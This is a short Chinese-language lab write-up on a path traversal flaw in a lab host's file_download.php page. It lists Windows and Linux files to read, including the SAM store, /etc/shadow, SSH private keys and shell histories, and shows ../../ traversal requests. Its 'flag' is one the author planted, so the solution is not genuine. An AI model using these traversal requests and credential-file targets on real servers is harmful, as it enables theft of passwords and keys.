0x01 漏洞利用
1.首先打开页面:
分别下载下来 内容分别是 life is sort, your need me. 和 HELLO WORLD 好吧没发现flag
2.审查元素:
3. windows和linux系统的关键文件:
Windows:
C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息
C:\Windows\win.ini //Windows系统的一个基本系统配置文件
Linux:
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_ras.keystore
/root/.ssh/known_hosts //记录每个访问计算机用户的公钥
/etc/passwd
/etc/shadow
/etc/my.cnf //mysql配置文件
/etc/httpd/conf/httpd.conf //apache配置文件
/root/.bash_history //用户历史命令记录文件
/root/.mysql_history //mysql历史命令记录文件
/proc/mounts //记录系统挂载设备
/porc/config.gz //内核配置文件
/var/lib/mlocate/mlocate.db //全文件路径
/porc/self/cmdline //当前进程的cmdline参数
参考链接:
https://www.cnblogs.com/zhaijiahui/p/8459661.html
4.手工试文件目录:
192.168.72.136/control/filedownload/file_download.php?file=boot.ini | 页面没有反应 |
192.168.72.136/control/filedownload/file_download.php?file=../boot.ini | 页面没有反应 |
192.168.72.136/control/filedownload/file_download.php?file=../../boot.ini | 页面提示下载 |
5.在服务器根目录搜索txt文件:
基本上都打开看了一遍没有找到flag
6.自建flag:在1.txt所在目录新建文件3.txt(毕竟这个我们可能会猜到) 同时内容为 sadfvgsadfhe
7.打开链接
192.168.72.136/control/filedownload/file_download.php?file=template/assets/img/3.txt
8.打开之后找到flag: sadfvgsadfhe
0x02 结语
不想说话